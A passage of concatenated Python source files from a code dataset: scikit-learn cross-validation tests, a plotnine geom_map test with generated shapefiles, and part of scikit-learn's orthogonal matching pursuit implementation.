MockEstimatorWithSingleFitCallAllowed(), X, y,
param_name="param", param_range=param_range, cv=2
)
def test_validation_curve_cv_splits_consistency():
n_samples = 100
n_splits = 5
X, y = make_classification(n_samples=100, random_state=0)
scores1 = validation_curve(SVC(kernel='linear', random_state=0), X, y,
'C', [0.1, 0.1, 0.2, 0.2],
cv=OneTimeSplitter(n_splits=n_splits,
n_samples=n_samples))
# The OneTimeSplitter is a non-re-entrant cv splitter. Unless, the
# `split` is called for each parameter, the following should produce
# identical results for param setting 1 and param setting 2 as both have
# the same C value.
assert_array_almost_equal(*np.vsplit(np.hstack(scores1)[(0, 2, 1, 3), :],
2))
scores2 = validation_curve(SVC(kernel='linear', random_state=0), X, y,
'C', [0.1, 0.1, 0.2, 0.2],
cv=KFold(n_splits=n_splits, shuffle=True))
# For scores2, compare the 1st and 2nd parameter's scores
# (Since the C value for 1st two param setting is 0.1, they must be
# consistent unless the train test folds differ between the param settings)
assert_array_almost_equal(*np.vsplit(np.hstack(scores2)[(0, 2, 1, 3), :],
2))
scores3 = validation_curve(SVC(kernel='linear', random_state=0), X, y,
'C', [0.1, 0.1, 0.2, 0.2],
cv=KFold(n_splits=n_splits))
# OneTimeSplitter is basically unshuffled KFold(n_splits=5). Sanity check.
assert_array_almost_equal(np.array(scores3), np.array(scores1))
def test_check_is_permutation():
rng = np.random.RandomState(0)
p = np.arange(100)
rng.shuffle(p)
assert_true(_check_is_permutation(p, 100))
assert_false(_check_is_permutation(np.delete(p, 23), 100))
p[0] = 23
assert_false(_check_is_permutation(p, 100))
# Check if the additional duplicate indices are caught
assert_false(_check_is_permutation(np.hstack((p, 0)), 100))
def test_cross_val_predict_sparse_prediction():
# check that cross_val_predict gives same result for sparse and dense input
X, y = make_multilabel_classification(n_classes=2, n_labels=1,
allow_unlabeled=False,
return_indicator=True,
random_state=1)
X_sparse = csr_matrix(X)
y_sparse = csr_matrix(y)
classif = OneVsRestClassifier(SVC(kernel='linear'))
preds = cross_val_predict(classif, X, y, cv=10)
preds_sparse = cross_val_predict(classif, X_sparse, y_sparse, cv=10)
preds_sparse = preds_sparse.toarray()
assert_array_almost_equal(preds_sparse, preds)
def check_cross_val_predict_with_method(est):
iris = load_iris()
X, y = iris.data, iris.target
X, y = shuffle(X, y, random_state=0)
classes = len(set(y))
kfold = KFold()
methods = ['decision_function', 'predict_proba', 'predict_log_proba']
for method in methods:
predictions = cross_val_predict(est, X, y, method=method)
assert_equal(len(predictions), len(y))
expected_predictions = np.zeros([len(y), classes])
func = getattr(est, method)
# Naive loop (should be same as cross_val_predict):
for train, test in kfold.split(X, y):
est.fit(X[train], y[train])
expected_predictions[test] = func(X[test])
predictions = cross_val_predict(est, X, y, method=method,
cv=kfold)
assert_array_almost_equal(expected_predictions, predictions)
# Test alternative representations of y
predictions_y1 = cross_val_predict(est, X, y + 1, method=method,
cv=kfold)
assert_array_equal(predictions, predictions_y1)
predictions_y2 = cross_val_predict(est, X, y - 2, method=method,
cv=kfold)
assert_array_equal(predictions, predictions_y2)
predictions_ystr = cross_val_predict(est, X, y.astype('str'),
method=method, cv=kfold)
assert_array_equal(predictions, predictions_ystr)
def test_cross_val_predict_with_method():
check_cross_val_predict_with_method(LogisticRegression())
def test_cross_val_predict_method_checking():
# Regression test for issue #9639. Tests that cross_val_predict does not
# check estimator methods (e.g. predict_proba) before fitting
est = SGDClassifier(loss='log', random_state=2)
check_cross_val_predict_with_method(est)
def test_gridsearchcv_cross_val_predict_with_method():
est = GridSearchCV(LogisticRegression(random_state=42),
{'C': [0.1, 1]},
cv=2)
check_cross_val_predict_with_method(est)
def get_expected_predictions(X, y, cv, classes, est, method):
expected_predictions = np.zeros([len(y), classes])
func = getattr(est, method)
for train, test in cv.split(X, y):
est.fit(X[train], y[train])
expected_predictions_ = func(X[test])
# To avoid 2 dimensional indexing
if method is 'predict_proba':
exp_pred_test = np.zeros((len(test), classes))
else:
exp_pred_test = np.full((len(test), classes),
np.finfo(expected_predictions.dtype).min)
exp_pred_test[:, est.classes_] = expected_predictions_
expected_predictions[test] = exp_pred_test
return expected_predictions
def test_cross_val_predict_class_subset():
X = np.arange(200).reshape(100, 2)
y = np.array([x//10 for x in range(100)])
classes = 10
kfold3 = KFold(n_splits=3)
kfold4 = KFold(n_splits=4)
le = LabelEncoder()
methods = ['decision_function', 'predict_proba', 'predict_log_proba']
for method in methods:
est = LogisticRegression()
# Test with n_splits=3
predictions = cross_val_predict(est, X, y, method=method,
cv=kfold3)
# Runs a naive loop (should be same as cross_val_predict):
expected_predictions = get_expected_predictions(X, y, kfold3, classes,
est, method)
assert_array_almost_equal(expected_predictions, predictions)
# Test with n_splits=4
predictions = cross_val_predict(est, X, y, method=method,
cv=kfold4)
expected_predictions = get_expected_predictions(X, y, kfold4, classes,
est, method)
assert_array_almost_equal(expected_predictions, predictions)
# Testing unordered labels
y = shuffle(np.repeat(range(10), 10), random_state=0)
predictions = cross_val_predict(est, X, y, method=method,
cv=kfold3)
y = le.fit_transform(y)
expected_predictions = get_expected_predictions(X, y, kfold3, classes,
est, method)
assert_array_almost_equal(expected_predictions, predictions)
def test_score_memmap():
# Ensure a scalar score of memmap type is accepted
iris = load_iris()
X, y = iris.data, iris.target
clf = MockClassifier()
tf = tempfile.NamedTemporaryFile(mode='wb', delete=False)
tf.write(b'Hello world!!!!!')
tf.close()
scores = np.memmap(tf.name, dtype=np.float64)
score = np.memmap(tf.name, shape=(), mode='r', dtype=np.float64)
try:
cross_val_score(clf, X, y, scoring=lambda est, X, y: score)
# non-scalar should still fail
assert_raises(ValueError, cross_val_score, clf, X, y,
scoring=lambda est, X, y: scores)
finally:
# Best effort to release the mmap file handles before deleting the
# backing file under Windows
scores, score = None, None
for _ in range(3):
try:
os.unlink(tf.name)
break
except WindowsError:
sleep(1.)
def test_permutation_test_score_pandas():
# check permutation_test_score doesn't destroy pandas dataframe
types = [(MockDataFrame, MockDataFrame)]
try:
from pandas import Series, DataFrame
types.append((Series, DataFrame))
except ImportError:
pass
for TargetType, InputFeatureType in types:
# X dataframe, y series
iris = load_iris()
X, y = iris.data, iris.target
X_df, y_ser = InputFeatureType(X), TargetType(y)
check_df = lambda x: isinstance(x, InputFeatureType)
check_series = lambda x: isinstance(x, TargetType)
clf = CheckingClassifier(check_X=check_df, check_y=check_series)
permutation_test_score(clf, X_df, y_ser)
| mit |
has2k1/plotnine | plotnine/tests/test_geom_map.py | 1 | 2879 | import numpy as np
import shapefile
from geopandas import GeoDataFrame
from plotnine import ggplot, aes, geom_map, labs, theme, facet_wrap
_theme = theme(subplots_adjust={'right': 0.85})
def _point_file(test_file):
with shapefile.Writer(test_file, shapefile.POINT) as shp:
shp.field('name', 'C')
shp.point(0, 0)
shp.record('point1')
shp.point(0, 1)
shp.record('point2')
shp.point(1, 1)
shp.record('point3')
shp.point(1, 0)
shp.record('point4')
def _polygon_file(test_file):
with shapefile.Writer(test_file, shapefile.POLYGON) as shp:
shp.field('name', 'C')
shp.poly([
[[.25, -.25], [.25, .25], [.75, .25], [.75, -.25]],
])
shp.record('polygon1')
shp.poly([
[[.25, .75], [.75, .75], [.5, 1.25]]
])
shp.record('polygon2')
def _polyline_file(test_file):
with shapefile.Writer(test_file, shapefile.POLYLINE) as shp:
shp.field('name', 'C')
n = 5
x = np.repeat(np.linspace(0, 1, n), 2)
y = np.tile([0.375, 0.625], n)
shp.line([list(zip(x, y))])
shp.record('line1')
def _polylinem_file(test_file):
with shapefile.Writer(test_file, shapefile.POLYLINEM) as shp:
shp.field('name', 'C')
n = 5
x = np.repeat(np.linspace(0, 1, n), 2)
y = np.tile([0.375, 0.625], n) + 1
line = list(zip(x, y))
shp.linem([line[:5], line[5:]])
shp.record('linem1')
def test_geometries(tmpdir):
point_file = '{}/test_file_point.shp'.format(tmpdir)
polygon_file = '{}/test_file_polygon.shp'.format(tmpdir)
polyline_file = '{}/test_file_polyline.shp'.format(tmpdir)
polylinem_file = '{}/test_file_polylinem.shp'.format(tmpdir)
_point_file(point_file)
_polygon_file(polygon_file)
_polyline_file(polyline_file)
_polylinem_file(polylinem_file)
df_point = GeoDataFrame.from_file(point_file)
df_polygon = GeoDataFrame.from_file(polygon_file)
df_polyline = GeoDataFrame.from_file(polyline_file)
df_polylinem = GeoDataFrame.from_file(polylinem_file)
p = (ggplot()
+ aes(fill='geometry.bounds.miny')
+ geom_map(df_polygon)
+ geom_map(df_point, size=4)
+ geom_map(df_polyline, size=2)
+ geom_map(df_polylinem, size=2)
+ labs(fill='miny')
)
assert p + _theme == 'geometries'
def test_facet_wrap(tmpdir):
polygon_file = '{}/test_file_polygon.shp'.format(tmpdir)
_polygon_file(polygon_file)
df_polygon = GeoDataFrame.from_file(polygon_file)
df_polygon['shape'] = ['rectangle', 'triangle']
p = (ggplot()
+ aes(fill='geometry.bounds.miny')
+ geom_map(df_polygon)
+ facet_wrap('shape')
+ labs(fill='miny')
)
assert p + _theme == 'facet_wrap'
| gpl-2.0 |
B3AU/waveTree | sklearn/linear_model/omp.py | 3 | 31732 | """Orthogonal matching pursuit algorithms
"""
# Author: Vlad Niculae
#
# License: BSD 3 clause
import warnings
import numpy as np
from scipy import linalg
from scipy.linalg.lapack import get_lapack_funcs
from .base import LinearModel, _pre_fit
from ..base import RegressorMixin
from ..utils import array2d, as_float_array, check_arrays
from ..cross_validation import _check_cv as check_cv
from ..externals.joblib import Parallel, delayed
from ..utils.arrayfuncs import solve_triangular
premature = """ Orthogonal matching pursuit ended prematurely due to linear
dependence in the dictionary. The requested precision might not have been met.
"""
def _cholesky_omp(X, y, n_nonzero_coefs, tol=None, copy_X=True,
return_path=False):
"""Orthogonal Matching Pursuit step using the Cholesky decomposition.
Parameters
----------
X : array, shape (n_samples, n_features)
Input dictionary. Columns are assumed to have unit norm.
y : array, shape (n_samples,)
Input targets
n_nonzero_coefs : int
Targeted number of non-zero elements
tol : float
Targeted squared error, if not None overrides n_nonzero_coefs.
copy_X : bool, optional
Whether the design matrix X must be copied by the algorithm. A false
value is only helpful if X is already Fortran-ordered, otherwise a
copy is made anyway.
return_path : bool, optional. Default: False
Whether to return every value of the nonzero coefficients along the
forward path. Useful for cross-validation.
Returns
-------
gamma : array, shape (n_nonzero_coefs,)
Non-zero elements of the solution
idx : array, shape (n_nonzero_coefs,)
Indices of the positions of the elements in gamma within the solution
vector
coef : array, shape (n_features, n_nonzero_coefs)
The first k values of column k correspond to the coefficient value
for the active features at that step. The lower left triangle contains
garbage. Only returned if ``return_path=True``.
"""
if copy_X:
X = X.copy('F')
else: # even if we are allowed to overwrite, still copy it if bad order
X = np.asfortranarray(X)
min_float = np.finfo(X.dtype).eps
nrm2, swap = linalg.get_blas_funcs(('nrm2', 'swap'), (X,))
potrs, = get_lapack_funcs(('potrs',), (X,))
alpha = np.dot(X.T, y)
residual = y
gamma = np.empty(0)
n_active = 0
indices = np.arange(X.shape[1]) # keeping track of swapping
max_features = X.shape[1] if tol is not None else n_nonzero_coefs
L = np.empty((max_features, max_features), dtype=X.dtype)
L[0, 0] = 1.
if return_path:
coefs = np.empty_like(L)
while True:
lam = np.argmax(np.abs(np.dot(X.T, residual)))
if lam < n_active or alpha[lam] ** 2 < min_float:
# atom already selected or inner product too small
warnings.warn(premature, RuntimeWarning, stacklevel=2)
break
if n_active > 0:
# Updates the Cholesky decomposition of X' X
L[n_active, :n_active] = np.dot(X[:, :n_active].T, X[:, lam])
solve_triangular(L[:n_active, :n_active], L[n_active, :n_active])
v = nrm2(L[n_active, :n_active]) ** 2
if 1 - v <= min_float: # selected atoms are dependent
warnings.warn(premature, RuntimeWarning, stacklevel=2)
break
L[n_active, n_active] = np.sqrt(1 - v)
X.T[n_active], X.T[lam] = swap(X.T[n_active], X.T[lam])
alpha[n_active], alpha[lam] = alpha[lam], alpha[n_active]
indices[n_active], indices[lam] = indices[lam], indices[n_active]
n_active += 1
# solves LL'x = y as a composition of two triangular systems
gamma, _ = potrs(L[:n_active, :n_active], alpha[:n_active], lower=True,
overwrite_b=False)
if return_path:
coefs[:n_active, n_active - 1] = gamma
residual = y - np.dot(X[:, :n_active], gamma)
if tol is not None and nrm2(residual) ** 2 <= tol:
break
elif n_active == max_features:
break
if return_path:
return gamma, indices[:n_active], coefs[:, :n_active]
else:
return gamma, indices[:n_active]
def _gram_omp(Gram, Xy, n_nonzero_coefs, tol_0=None, tol=None,
copy_Gram=True, copy_Xy=True, return_path=False):
"""Orthogonal Matching Pursuit step on a precomputed Gram matrix.
This function uses the the Cholesky decomposition method.
Parameters
----------
Gram : array, shape (n_features, n_features)
Gram matrix of the input data matrix
Xy : array, shape (n_features,)
Input targets
n_nonzero_coefs : int
Targeted number of non-zero elements
tol_0 : float
Squared norm of y, required if tol is not None.
tol : float
Targeted squared error, if not None overrides n_nonzero_coefs.
copy_Gram : bool, optional
Whether the gram matrix must be copied by the algorithm. A false
value is only helpful if it is already Fortran-ordered, otherwise a
copy is made anyway.
copy_Xy : bool, optional
Whether the covariance vector Xy must be copied by the algorithm.
If False, it may be overwritten.
return_path : bool, optional. Default: False
Whether to return every value of the nonzero coefficients along the
forward path. Useful for cross-validation.
Returns
-------
gamma : array, shape (n_nonzero_coefs,)
Non-zero elements of the solution
idx : array, shape (n_nonzero_coefs,)
Indices of the positions of the elements in gamma within the solution
vector
coefs : array, shape (n_features, n_nonzero_coefs)
The first k values of column k correspond to the coefficient value
for the active features at that step. The lower left triangle contains
garbage. Only returned if ``return_path=True``.
"""
Gram = Gram.copy('F') if copy_Gram else np.asfortranarray(Gram)
if copy_Xy:
Xy = Xy.copy()
min_float = np.finfo(Gram.dtype).eps
nrm2, swap = linalg.get_blas_funcs(('nrm2', 'swap'), (Gram,))
potrs, = get_lapack_funcs(('potrs',), (Gram,))
indices = np.arange(len(Gram)) # keeping track of swapping
alpha = Xy
tol_curr = tol_0
delta = 0
gamma = np.empty(0)
n_active = 0
max_features = len(Gram) if tol is not None else n_nonzero_coefs
L = np.empty((max_features, max_features), dtype=Gram.dtype)
L[0, 0] = 1.
if return_path:
coefs = np.empty_like(L)
while True:
lam = np.argmax(np.abs(alpha))
if lam < n_active or alpha[lam] ** 2 < min_float:
# selected same atom twice, or inner product too small
warnings.warn(premature, RuntimeWarning, stacklevel=2)
break
if n_active > 0:
L[n_active, :n_active] = Gram[lam, :n_active]
solve_triangular(L[:n_active, :n_active], L[n_active, :n_active])
v = nrm2(L[n_active, :n_active]) ** 2
if 1 - v <= min_float: # selected atoms are dependent
warnings.warn(premature, RuntimeWarning, stacklevel=2)
break
L[n_active, n_active] = np.sqrt(1 - v)
Gram[n_active], Gram[lam] = swap(Gram[n_active], Gram[lam])
Gram.T[n_active], Gram.T[lam] = swap(Gram.T[n_active], Gram.T[lam])
indices[n_active], indices[lam] = indices[lam], indices[n_active]
Xy[n_active], Xy[lam] = Xy[lam], Xy[n_active]
n_active += 1
# solves LL'x = y as a composition of two triangular systems
gamma, _ = potrs(L[:n_active, :n_active], Xy[:n_active], lower=True,
overwrite_b=False)
if return_path:
coefs[:n_active, n_active - 1] = gamma
beta = np.dot(Gram[:, :n_active], gamma)
alpha = Xy - beta
if tol is not None:
tol_curr += delta
delta = np.inner(gamma, beta[:n_active])
tol_curr -= delta
if tol_curr <= tol:
break
elif n_active == max_features:
break
if return_path:
return gamma, indices[:n_active], coefs[:, :n_active]
else:
return gamma, indices[:n_active]
def orthogonal_mp(X, y, n_nonzero_coefs=None, tol=None, precompute=False,
copy_X=True, return_path=False, precompute_gram=None):
"""Orthogonal Matching Pursuit (OMP)
Solves n_targets Orthogonal Matching Pursuit problems.
An instance of the problem has the form:
When parametrized by the number of non-zero coefficients using
`n_nonzero_coefs`:
argmin ||y - X\gamma||^2 subject to ||\gamma||_0 <= n_{nonzero coefs}
When parametrized by error using the parameter `tol`:
argmin ||\gamma||_0 subject to ||y - X\gamma||^2 <= tol
Parameters
----------
X: array, shape (n_samples, n_features)
Input data. Columns are assumed to have unit norm.
y: array, shape (n_samples,) or (n_samples, n_targets)
Input targets
n_nonzero_coefs: int
Desired number of non-zero entries in the solution. If None (by
default) this value is set to 10% of n_features.
tol: float
Maximum norm of the residual. If not None, overrides n_nonzero_coefs.
precompute: {True, False, 'auto'},
Whether to perform precomputations. Improves performance when n_targets
or n_samples is very large.
copy_X: bool, optional
Whether the design matrix X must be copied by the algorithm. A false
value is only helpful if X is already Fortran-ordered, otherwise a
copy is made anyway.
return_path: bool, optional. Default: False
Whether to return every value of the nonzero coefficients along the
forward path. Useful for cross-validation.
Returns
-------
coef: array, shape (n_features,) or (n_features, n_targets)
Coefficients of the OMP solution. If `return_path=True`, this contains
the whole coefficient path. In this case its shape is
(n_features, n_features) or (n_features, n_targets, n_features) and
iterating over the last axis yields coefficients in increasing order
of active features.
See also
--------
OrthogonalMatchingPursuit
orthogonal_mp_gram
lars_path
decomposition.sparse_encode
Notes
-----
Orthogonal matching pursuit was introduced in G. Mallat, Z. Zhang,
Matching pursuits with time-frequency dictionaries, IEEE Transactions on
Signal Processing, Vol. 41, No. 12. (December 1993), pp. 3397-3415.
(http://blanche.polytechnique.fr/~mallat/papiers/MallatPursuit93.pdf)
This implementation is based on Rubinstein, R., Zibulevsky, M. and Elad,
M., Efficient Implementation of the K-SVD Algorithm using Batch Orthogonal
Matching Pursuit Technical Report - CS Technion, April 2008.
http://www.cs.technion.ac.il/~ronrubin/Publications/KSVD-OMP-v2.pdf
"""
if precompute_gram is not None:
warnings.warn("precompute_gram will be removed in 0.15."
" Use the precompute parameter.",
DeprecationWarning, stacklevel=2)
precompute = precompute_gram
del precompute_gram
X = array2d(X, order='F', copy=copy_X)
copy_X = False
y = np.asarray(y)
if y.ndim == 1:
y = y[:, np.newaxis]
if y.shape[1] > 1: # subsequent targets will be affected
copy_X = True
if n_nonzero_coefs is None and tol is None:
# default for n_nonzero_coefs is 0.1 * n_features
# but at least one.
n_nonzero_coefs = max(int(0.1 * X.shape[1]), 1)
if tol is not None and tol < 0:
raise ValueError("Epsilon cannot be negative")
if tol is None and n_nonzero_coefs <= 0:
raise ValueError("The number of atoms must be positive")
if tol is None and n_nonzero_coefs > X.shape[1]:
raise ValueError("The number of atoms cannot be more than the number "
"of features")
if precompute == 'auto':
precompute = X.shape[0] > X.shape[1]
if precompute:
G = np.dot(X.T, X)
G = np.asfortranarray(G)
Xy = np.dot(X.T, y)
if tol is not None:
norms_squared = np.sum((y ** 2), axis=0)
else:
norms_squared = None
return orthogonal_mp_gram(G, Xy, n_nonzero_coefs, tol, norms_squared,
copy_Gram=copy_X, copy_Xy=False)
if return_path:
coef = np.zeros((X.shape[1], y.shape[1], X.shape[1]))
else:
coef = np.zeros((X.shape[1], y.shape[1]))
for k in range(y.shape[1]):
out = _cholesky_omp(X, y[:, k], n_nonzero_coefs, tol,
copy_X=copy_X, return_path=return_path)
if return_path:
_, idx, coefs = out
coef = coef[:, :, :len(idx)]
for n_active, x in enumerate(coefs.T):
coef[idx[:n_active + 1], k, n_active] = x[:n_active + 1]
else:
x, idx = out
coef[idx, k] = x
return np.squeeze(coef)
def orthogonal_mp_gram(Gram, Xy, n_nonzero_coefs=None, tol=None,
norms_squared=None, copy_Gram=True,
copy_Xy=True, return_path=False):
"""Gram Orthogonal Matching Pursuit (OMP)
Solves n_targets Orthogonal Matching Pursuit problems using only
the Gram matrix X.T * X and the product X.T * y.
Parameters
----------
Gram: array, shape (n_features, n_features)
Gram matrix of the input data: X.T * X
Xy: array, shape (n_features,) or (n_features, n_targets)
Input targets multiplied by X: X.T * y
n_nonzero_coefs: int
Desired number of non-zero entries in the solution. If None (by
default) this value is set to 10% of n_features.
tol: float
Maximum norm of the residual. If not None, overrides n_nonzero_coefs.
norms_squared: array-like, shape (n_targets,)
Squared L2 norms of the lines of y. Required if tol is not None.
copy_Gram: bool, optional
Whether the gram matrix must be copied by the algorithm. A false
value is only helpful if it is already Fortran-ordered, otherwise a
copy is made anyway.
copy_Xy: bool, optional
Whether the covariance vector Xy must be copied by the algorithm.
If False, it may be overwritten.
return_path: bool, optional. Default: False
Whether to return every value of the nonzero coefficients along the
forward path. Useful for cross-validation.
Returns
-------
coef: array, shape (n_features,) or (n_features, n_targets)
Coefficients of the OMP solution. If `return_path=True`, this contains
the whole coefficient path. In this case its shape is
(n_features, n_features) or (n_features, n_targets, n_features) and
iterating over the last axis yields coefficients in increasing order
of active features.
See also
--------
OrthogonalMatchingPursuit
orthogonal_mp
lars_path
decomposition.sparse_encode
Notes
-----
Orthogonal matching pursuit was introduced in G. Mallat, Z. Zhang,
Matching pursuits with time-frequency dictionaries, IEEE Transactions on
Signal Processing, Vol. 41, No. 12. (December 1993), pp. 3397-3415.
(http://blanche.polytechnique.fr/~mallat/papiers/MallatPursuit93.pdf)
This implementation is based on Rubinstein, R., Zibulevsky, M. and Elad,
M., Efficient Implementation of the K-SVD Algorithm using Batch Orthogonal
Matching Pursuit Technical Report - CS Technion, April 2008.
http://www.cs.technion.ac.il/~ronrubin/Publications/KSVD-OMP-v2.pdf
"""
Gram = array2d(Gram, order='F', copy=copy_Gram)
Xy = np.asarray(Xy)
if Xy.ndim > 1 and Xy.shape[1] > 1:
# or subsequent target will be affected
copy_Gram = True
if Xy.ndim == 1:
Xy = Xy[:, np.newaxis]
if tol is not None:
norms_squared = [norms_squared]
if n_nonzero_coefs is None and tol is None:
n_nonzero_coefs = int(0.1 * len(Gram))
if tol is not None and norms_squared is None:
raise ValueError('Gram OMP needs the precomputed norms in order '
'to evaluate the error sum of squares.')
if tol is not None and tol < 0:
raise ValueError("Epsilon cannot be negative")
if tol is None and n_nonzero_coefs <= 0:
raise ValueError("The number of atoms must be positive")
if tol is None and n_nonzero_coefs > len(Gram):
raise ValueError("The number of atoms cannot be more than the number "
"of features")
if return_path:
coef = np.zeros((len(Gram), Xy.shape[1], len(Gram)))
else:
coef = np.zeros((len(Gram), Xy.shape[1]))
for k in range(Xy.shape[1]):
out = _gram_omp(Gram, Xy[:, k], n_nonzero_coefs,
norms_squared[k] if tol is not None else None, tol,
copy_Gram=copy_Gram, copy_Xy=copy_Xy,
return_path=return_path)
if return_path:
_, idx, coefs = out
coef = coef[:, :, :len(idx)]
for n_active, x in enumerate(coefs.T):
coef[idx[:n_active + 1], k, n_active] = x[:n_active + 1]
else:
x, idx = out
coef[idx, k] = x
return np.squeeze(coef)
class OrthogonalMatchingPursuit(LinearModel, RegressorMixin):
"""Orthogonal Mathching Pursuit model (OMP)
Parameters
----------
n_nonzero_coefs : int, optional
Desired number of non-zero entries in the solution. If None (by
default) this value is set to 10% of n_features.
tol : float, optional
Maximum norm of the residual. If not None, overrides n_nonzero_coefs.
fit_intercept : boolean, optional
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional
If False, the regressors X are assumed to be already normalized.
precompute : {True, False, 'auto'}, default 'auto'
Whether to use a precomputed Gram and Xy matrix to speed up
calculations. Improves performance when `n_targets` or `n_samples` is
very large. Note that if you already have such matrices, you can pass
them directly to the fit method.
copy_X : bool, optional
Whether the design matrix X must be copied by the algorithm. A false
value is only helpful if X is already Fortran-ordered, otherwise a
copy is made anyway.
WARNING : will be deprecated in 0.15
copy_Gram : bool, optional
Whether the gram matrix must be copied by the algorithm. A false
value is only helpful if X is already Fortran-ordered, otherwise a
copy is made anyway.
WARNING : will be deprecated in 0.15
copy_Xy : bool, optional
Whether the covariance vector Xy must be copied by the algorithm.
If False, it may be overwritten.
WARNING : will be deprecated in 0.15
Attributes
----------
`coef_` : array, shape (n_features,) or (n_features, n_targets)
parameter vector (w in the formula)
`intercept_` : float or array, shape (n_targets,)
independent term in decision function.
Notes
-----
Orthogonal matching pursuit was introduced in G. Mallat, Z. Zhang,
Matching pursuits with time-frequency dictionaries, IEEE Transactions on
Signal Processing, Vol. 41, No. 12. (December 1993), pp. 3397-3415.
(http://blanche.polytechnique.fr/~mallat/papiers/MallatPursuit93.pdf)
This implementation is based on Rubinstein, R., Zibulevsky, M. and Elad,
M., Efficient Implementation of the K-SVD Algorithm using Batch Orthogonal
Matching Pursuit Technical Report - CS Technion, April 2008.
http://www.cs.technion.ac.il/~ronrubin/Publications/KSVD-OMP-v2.pdf
See also
--------
orthogonal_mp
orthogonal_mp_gram
lars_path
Lars
LassoLars
decomposition.sparse_encode
"""
def __init__(self, copy_X=None, copy_Gram=None, copy_Xy=None,
n_nonzero_coefs=None, tol=None, fit_intercept=True,
normalize=True, precompute='auto', precompute_gram=None):
self.n_nonzero_coefs = n_nonzero_coefs
self.tol = tol
self.fit_intercept = fit_intercept
self.normalize = normalize
self.precompute = precompute
self.precompute_gram = precompute_gram
self.copy_Gram = copy_Gram
self.copy_Xy = copy_Xy
self.copy_X = copy_X
def fit(self, X, y, Gram=None, Xy=None):
"""Fit the model using X, y as training data.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data.
y : array-like, shape (n_samples,) or (n_samples, n_targets)
Target values.
Gram : array-like, shape (n_features, n_features) (optional)
Gram matrix of the input data: X.T * X
WARNING : will be deprecated in 0.15
Xy : array-like, shape (n_features,) or (n_features, n_targets)
(optional)
Input targets multiplied by X: X.T * y
WARNING : will be deprecated in 0.15
Returns
-------
self: object
returns an instance of self.
"""
X = array2d(X)
y = np.asarray(y)
n_features = X.shape[1]
if self.precompute_gram is not None:
warnings.warn("precompute_gram will be removed in 0.15."
" Use the precompute parameter.",
DeprecationWarning, stacklevel=2)
precompute = self.precompute_gram
else:
precompute = self.precompute
if self.copy_Gram is not None:
warnings.warn("copy_Gram will be removed in 0.15."
" Use the orthogonal_mp function for"
" low level memory control.",
DeprecationWarning, stacklevel=2)
copy_Gram = self.copy_Gram
else:
copy_Gram = True
if self.copy_Xy is not None:
warnings.warn("copy_Xy will be removed in 0.15."
" Use the orthogonal_mp function for"
" low level memory control.",
DeprecationWarning, stacklevel=2)
copy_Xy = self.copy_Xy
else:
copy_Xy = True
if self.copy_X is not None:
warnings.warn("copy_X will be removed in 0.15."
" Use the orthogonal_mp function for"
" low level memory control.",
DeprecationWarning, stacklevel=2)
copy_X = self.copy_X
else:
copy_X = True
if Gram is not None:
warnings.warn("Gram will be removed in 0.15."
" Use the orthogonal_mp function for"
" low level memory control.",
DeprecationWarning, stacklevel=2)
if Xy is not None:
warnings.warn("Xy will be removed in 0.15."
" Use the orthogonal_mp function for"
" low level memory control.",
DeprecationWarning, stacklevel=2)
if (Gram is not None or Xy is not None) and (self.fit_intercept
or self.normalize):
warnings.warn('Mean subtraction (fit_intercept) and normalization '
'cannot be applied on precomputed Gram and Xy '
'matrices. Your precomputed values are ignored and '
'recomputed. To avoid this, do the scaling yourself '
'and call with fit_intercept and normalize set to '
'False.', RuntimeWarning, stacklevel=2)
Gram, Xy = None, None
if Gram is not None:
precompute = Gram
if Xy is not None and copy_Xy:
Xy = Xy.copy()
X, y, X_mean, y_mean, X_std, Gram, Xy = \
_pre_fit(X, y, Xy, precompute, self.normalize, self.fit_intercept,
copy=copy_X)
if y.ndim == 1:
y = y[:, np.newaxis]
if self.n_nonzero_coefs is None and self.tol is None:
# default for n_nonzero_coefs is 0.1 * n_features
# but at least one.
self.n_nonzero_coefs_ = max(int(0.1 * n_features), 1)
else:
self.n_nonzero_coefs_ = self.n_nonzero_coefs
if Gram is False:
self.coef_ = orthogonal_mp(X, y, self.n_nonzero_coefs_, self.tol,
precompute=False, copy_X=copy_X).T
else:
norms_sq = np.sum(y ** 2, axis=0) if self.tol is not None else None
self.coef_ = orthogonal_mp_gram(Gram, Xy, self.n_nonzero_coefs_,
self.tol, norms_sq,
copy_Gram, True).T
self._set_intercept(X_mean, y_mean, X_std)
return self
def _omp_path_residues(X_train, y_train, X_test, y_test, copy=True,
fit_intercept=True, normalize=True, max_iter=100):
"""Compute the residues on left-out data for a full LARS path
Parameters
-----------
X_train : array, shape (n_samples, n_features)
The data to fit the LARS on
y_train : array, shape (n_samples)
The target variable to fit LARS on
X_test : array, shape (n_samples, n_features)
The data to compute the residues on
y_test : array, shape (n_samples)
The target variable to compute the residues on
copy : boolean, optional
Whether X_train, X_test, y_train and y_test should be copied. If
False, they may be overwritten.
fit_intercept : boolean
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional, default False
If True, the regressors X will be normalized before regression.
max_iter : integer, optional
Maximum numbers of iterations to perform, therefore maximum features
to include. 100 by default.
Returns
-------
residues: array, shape (n_samples, max_features)
Residues of the prediction on the test data
"""
if copy:
X_train = X_train.copy()
y_train = y_train.copy()
X_test = X_test.copy()
y_test = y_test.copy()
if fit_intercept:
X_mean = X_train.mean(axis=0)
X_train -= X_mean
X_test -= X_mean
y_mean = y_train.mean(axis=0)
y_train = as_float_array(y_train, copy=False)
y_train -= y_mean
y_test = as_float_array(y_test, copy=False)
y_test -= y_mean
if normalize:
norms = np.sqrt(np.sum(X_train ** 2, axis=0))
nonzeros = np.flatnonzero(norms)
X_train[:, nonzeros] /= norms[nonzeros]
coefs = orthogonal_mp(X_train, y_train, n_nonzero_coefs=max_iter, tol=None,
precompute=False, copy_X=False,
return_path=True)
if coefs.ndim == 1:
coefs = coefs[:, np.newaxis]
if normalize:
coefs[nonzeros] /= norms[nonzeros][:, np.newaxis]
return np.dot(coefs.T, X_test.T) - y_test
class OrthogonalMatchingPursuitCV(LinearModel, RegressorMixin):
"""Cross-validated Orthogonal Mathching Pursuit model (OMP)
Parameters
----------
copy : bool, optional
Whether the design matrix X must be copied by the algorithm. A false
value is only helpful if X is already Fortran-ordered, otherwise a
copy is made anyway.
fit_intercept : boolean, optional
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional
